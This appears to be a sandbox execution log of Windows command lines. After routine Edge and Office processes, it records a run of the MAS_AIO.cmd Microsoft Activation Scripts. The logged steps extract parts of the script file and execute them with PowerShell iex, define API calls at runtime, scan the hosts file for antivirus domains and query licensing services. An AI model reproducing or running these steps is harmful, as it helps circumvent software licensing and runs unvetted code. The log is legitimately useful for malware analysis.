C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE

"C:\Program Files\Microsoft Office\root\Office16\POWERPNT.EXE"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,17437531230394570270,7119659543817770296,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4380 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1880,17437531230394570270,7119659543817770296,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4448 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=90.0.4430.212 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=90.0.818.66 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ffa741d3cb8,0x7ffa741d3cc8,0x7ffa741d3cd8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=2028 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2796 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4864 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4884 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\90.0.818.66\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5228 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5344 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5320 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4964 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5572 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5480 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5440 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5776 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5488 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=5760 /prefetch:8

C:\Windows\system32\AUDIODG.EXE

C:\Windows\system32\AUDIODG.EXE 0x00000000000004D4 0x00000000000004B4

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2968 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6164 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6704 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2016,15691241621969825166,14767883264428024423,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6800 /prefetch:8

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master\Microsoft-Activation-Scripts-master\MAS\All-In-One-Version-KL\MAS_AIO.cmd"

C:\Windows\System32\sc.exe

sc query Null

C:\Windows\System32\find.exe

find /i "RUNNING"

C:\Windows\System32\findstr.exe

findstr /v "$" "MAS_AIO.cmd"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c ver

C:\Windows\System32\reg.exe

reg query "HKCU\Console" /v ForceV2

C:\Windows\System32\find.exe

find /i "0x0"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /S /D /c" echo "AMD64 " "

C:\Windows\System32\find.exe

find /i "ARM64"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c echo prompt $E | cmd

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /S /D /c" echo prompt $E "

C:\Windows\System32\cmd.exe

cmd

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /S /D /c" echo "C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master\Microsoft-Activation-Scripts-master\MAS\All-In-One-Version-KL\MAS_AIO.cmd" "

C:\Windows\System32\find.exe

find /i "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\System32\cmd.exe

cmd /c "powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master\Microsoft-Activation-Scripts-master\MAS\All-In-One-Version-KL\MAS_AIO.cmd') -split ':PowerShellTest:\s*';iex ($f[1])""

C:\Windows\System32\find.exe

find /i "FullLanguage"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master\Microsoft-Activation-Scripts-master\MAS\All-In-One-Version-KL\MAS_AIO.cmd') -split ':PowerShellTest:\s*';iex ($f[1])"

C:\Windows\System32\fltMC.exe

fltmc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$TB = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0); [void]$TB.DefinePInvokeMethod('GetConsoleWindow', 'kernel32.dll', 22, 1, [IntPtr], @(), 1, 3).SetImplementationFlags(128); [void]$TB.DefinePInvokeMethod('SendMessageW', 'user32.dll', 22, 1, [IntPtr], @([IntPtr], [UInt32], [IntPtr], [IntPtr]), 1, 3).SetImplementationFlags(128); $hIcon = $TB.CreateType(); $hWnd = $hIcon::GetConsoleWindow(); echo $($hIcon::SendMessageW($hWnd, 127, 0, 0) -ne [IntPtr]::Zero);"

C:\Windows\System32\find.exe

find /i "True"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$t=[AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0); $t.DefinePInvokeMethod('GetStdHandle', 'kernel32.dll', 22, 1, [IntPtr], @([Int32]), 1, 3).SetImplementationFlags(128); $t.DefinePInvokeMethod('SetConsoleMode', 'kernel32.dll', 22, 1, [Boolean], @([IntPtr], [Int32]), 1, 3).SetImplementationFlags(128); $k=$t.CreateType(); $b=$k::SetConsoleMode($k::GetStdHandle(-10), 0x0080); & cmd.exe '/c' '"""C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master\Microsoft-Activation-Scripts-master\MAS\All-In-One-Version-KL\MAS_AIO.cmd""" -el -qedit'"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c ""C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master\Microsoft-Activation-Scripts-master\MAS\All-In-One-Version-KL\MAS_AIO.cmd" -el -qedit"

C:\Windows\System32\sc.exe

sc query Null

C:\Windows\System32\find.exe

find /i "RUNNING"

C:\Windows\System32\findstr.exe

findstr /v "$" "MAS_AIO.cmd"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /S /D /c" echo "-el -qedit" "

C:\Windows\System32\find.exe

find /i "/"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c ver

C:\Windows\System32\reg.exe

reg query "HKCU\Console" /v ForceV2

C:\Windows\System32\find.exe

find /i "0x0"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /S /D /c" echo "AMD64 " "

C:\Windows\System32\find.exe

find /i "ARM64"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c echo prompt $E | cmd

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /S /D /c" echo prompt $E "

C:\Windows\System32\cmd.exe

cmd

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /S /D /c" echo "C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master\Microsoft-Activation-Scripts-master\MAS\All-In-One-Version-KL\MAS_AIO.cmd" "

C:\Windows\System32\find.exe

find /i "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\System32\cmd.exe

cmd /c "powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master\Microsoft-Activation-Scripts-master\MAS\All-In-One-Version-KL\MAS_AIO.cmd') -split ':PowerShellTest:\s*';iex ($f[1])""

C:\Windows\System32\find.exe

find /i "FullLanguage"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master\Microsoft-Activation-Scripts-master\MAS\All-In-One-Version-KL\MAS_AIO.cmd') -split ':PowerShellTest:\s*';iex ($f[1])"

C:\Windows\System32\fltMC.exe

fltmc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$TB = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1).DefineDynamicModule(2, $False).DefineType(0); [void]$TB.DefinePInvokeMethod('GetConsoleWindow', 'kernel32.dll', 22, 1, [IntPtr], @(), 1, 3).SetImplementationFlags(128); [void]$TB.DefinePInvokeMethod('SendMessageW', 'user32.dll', 22, 1, [IntPtr], @([IntPtr], [UInt32], [IntPtr], [IntPtr]), 1, 3).SetImplementationFlags(128); $hIcon = $TB.CreateType(); $hWnd = $hIcon::GetConsoleWindow(); echo $($hIcon::SendMessageW($hWnd, 127, 0, 0) -ne [IntPtr]::Zero);"

C:\Windows\System32\find.exe

find /i "True"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c ping -4 -n 1 updatecheck.massgrave.dev

C:\Windows\System32\PING.EXE

ping -4 -n 1 updatecheck.massgrave.dev

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /S /D /c" echo "127.69.2.8" "

C:\Windows\System32\find.exe

find "127.69"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /S /D /c" echo "127.69.2.8" "

C:\Windows\System32\find.exe

find "127.69.2.8"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /S /D /c" echo "-el -qedit" "

C:\Windows\System32\find.exe

find /i "/S"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /S /D /c" echo "-el -qedit" "

C:\Windows\System32\find.exe

find /i "/"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop

C:\Windows\System32\reg.exe

reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /v Desktop

C:\Windows\System32\mode.com

mode 76, 33

C:\Windows\System32\choice.exe

choice /C:123456789H0 /N

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c ver

C:\Windows\System32\reg.exe

reg query "HKCU\Console" /v ForceV2

C:\Windows\System32\find.exe

find /i "0x0"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /S /D /c" echo "AMD64 " "

C:\Windows\System32\find.exe

find /i "ARM64"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c echo prompt $E | cmd

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /S /D /c" echo prompt $E "

C:\Windows\System32\cmd.exe

cmd

C:\Windows\System32\mode.com

mode 76, 25

C:\Windows\System32\choice.exe

choice /C:120 /N

C:\Windows\System32\mode.com

mode 110, 34

C:\Windows\System32\reg.exe

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\taskcache\tasks" /f Path /s

C:\Windows\System32\find.exe

find /i "AutoPico"

C:\Windows\System32\find.exe

find /i "avira.com" C:\Windows\System32\drivers\etc\hosts

C:\Windows\System32\find.exe

find /i "kaspersky.com" C:\Windows\System32\drivers\etc\hosts

C:\Windows\System32\find.exe

find /i "virustotal.com" C:\Windows\System32\drivers\etc\hosts

C:\Windows\System32\find.exe

find /i "mcafee.com" C:\Windows\System32\drivers\etc\hosts

C:\Windows\System32\sc.exe

sc start sppsvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /S /D /c" echo "1056" "

C:\Windows\System32\findstr.exe

findstr "577 225"

C:\Windows\System32\cmd.exe

cmd /c "wmic path Win32_ComputerSystem get CreationClassName /value"

C:\Windows\System32\find.exe

find /i "computersystem"

C:\Windows\System32\Wbem\WMIC.exe

wmic path Win32_ComputerSystem get CreationClassName /value

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c "powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); [void]$TypeBuilder.DefinePInvokeMethod('SLGetWindowsInformationDWORD', 'slc.dll', 'Public, Static', 1, [int], @([String], [int].MakeByRefType()), 1, 3); $Sku = 0; [void]$TypeBuilder.CreateType()::SLGetWindowsInformationDWORD('Kernel-BrandingInfo', [ref]$Sku); $Sku"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); [void]$TypeBuilder.DefinePInvokeMethod('SLGetWindowsInformationDWORD', 'slc.dll', 'Public, Static', 1, [int], @([String], [int].MakeByRefType()), 1, 3); $Sku = 0; [void]$TypeBuilder.CreateType()::SLGetWindowsInformationDWORD('Kernel-BrandingInfo', [ref]$Sku); $Sku

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control\ProductOptions" /v OSProductPfn 2>nul

C:\Windows\System32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\ProductOptions" /v OSProductPfn

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c "wmic Path Win32_OperatingSystem Get OperatingSystemSKU /format:LIST" 2>nul

C:\Windows\System32\Wbem\WMIC.exe

wmic Path Win32_OperatingSystem Get OperatingSystemSKU /format:LIST

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$f=[io.file]::ReadAllText('C:\Users\Admin\Downloads\Microsoft-Activation-Scripts-master\Microsoft-Activation-Scripts-master\MAS\All-In-One-Version-KL\MAS_AIO.cmd') -split ':winsubstatus\:.*';iex ($f[1])"

C:\Windows\System32\find.exe

find /i "Subscription_is_activated"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c "powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); $meth = $TypeBuilder.DefinePInvokeMethod('BrandingFormatString', 'winbrand.dll', 'Public, Static', 1, [String], @([String]), 1, 3); $meth.SetImplementationFlags(128); $TypeBuilder.CreateType()::BrandingFormatString('%WINDOWS_LONG%')"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe $AssemblyBuilder = [AppDomain]::CurrentDomain.DefineDynamicAssembly(4, 1); $ModuleBuilder = $AssemblyBuilder.DefineDynamicModule(2, $False); $TypeBuilder = $ModuleBuilder.DefineType(0); $meth = $TypeBuilder.DefinePInvokeMethod('BrandingFormatString', 'winbrand.dll', 'Public, Static', 1, [String], @([String]), 1, 3); $meth.SetImplementationFlags(128); $TypeBuilder.CreateType()::BrandingFormatString('%WINDOWS_LONG%')

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /S /D /c" echo "Windows 11 Pro" "

C:\Windows\System32\find.exe

find /i "Windows"

C:\Windows\System32\sc.exe

sc start sppsvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe "$job = Start-Job { (Get-WmiObject -Query 'SELECT * FROM SoftwareLicensingService').Version }; if (-not (Wait-Job $job -Timeout 30)) {write-host 'sppsvc is not working correctly. Help - https://massgrave.dev/troubleshoot'}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile

C:\Windows\System32\Wbem\WMIC.exe

wmic path SoftwareLicensingProduct where (LicenseStatus='1' and GracePeriodRemaining='0' and PartialProductKey is not NULL AND LicenseDependsOn is NULL) get Name /value

C:\Windows\System32\findstr.exe

findstr /i "Windows"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE

C:\Windows\System32\reg.exe

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment" /v PROCESSOR_ARCHITECTURE

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c ver

C:\Windows\System32\reg.exe

reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\taskcache\tasks" /f Path /s

C:\Windows\System32\find.exe

find /i "AutoPico"

C:\Windows\System32\find.exe

find /i "avira.com" C:\Windows\System32\drivers\etc\hosts

C:\Windows\System32\find.exe

find /i "kaspersky.com" C:\Windows\System32\drivers\etc\hosts

C:\Windows\System32\find.exe

find /i "virustotal.com" C:\Windows\System32\drivers\etc\hosts

C:\Windows\System32\find.exe

find /i "mcafee.com" C:\Windows\System32\drivers\etc\hosts

C:\Windows\System32\sc.exe

sc start sppsvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /S /D /c" echo "1056" "

C:\Windows\System32\findstr.exe

findstr "577 225"

C:\Windows\System32\sc.exe

sc query Null

C:\Windows\System32\sc.exe

sc start ClipSVC

C:\Windows\System32\sc.exe

sc query ClipSVC

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v DependOnService

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v Description

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v DisplayName

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v ErrorControl

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v ImagePath

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v ObjectName

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v Start

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\ClipSVC /v Type

C:\Windows\System32\sc.exe

sc start sppsvc

C:\Windows\System32\sc.exe

sc query sppsvc

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v DependOnService

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v Description

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v DisplayName

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v ErrorControl

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v ImagePath

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v ObjectName

C:\Windows\System32\reg.exe

reg query HKLM\SYSTEM\CurrentControlSet\Services\sppsvc /v Start

C:\Windows\System32\reg.exe

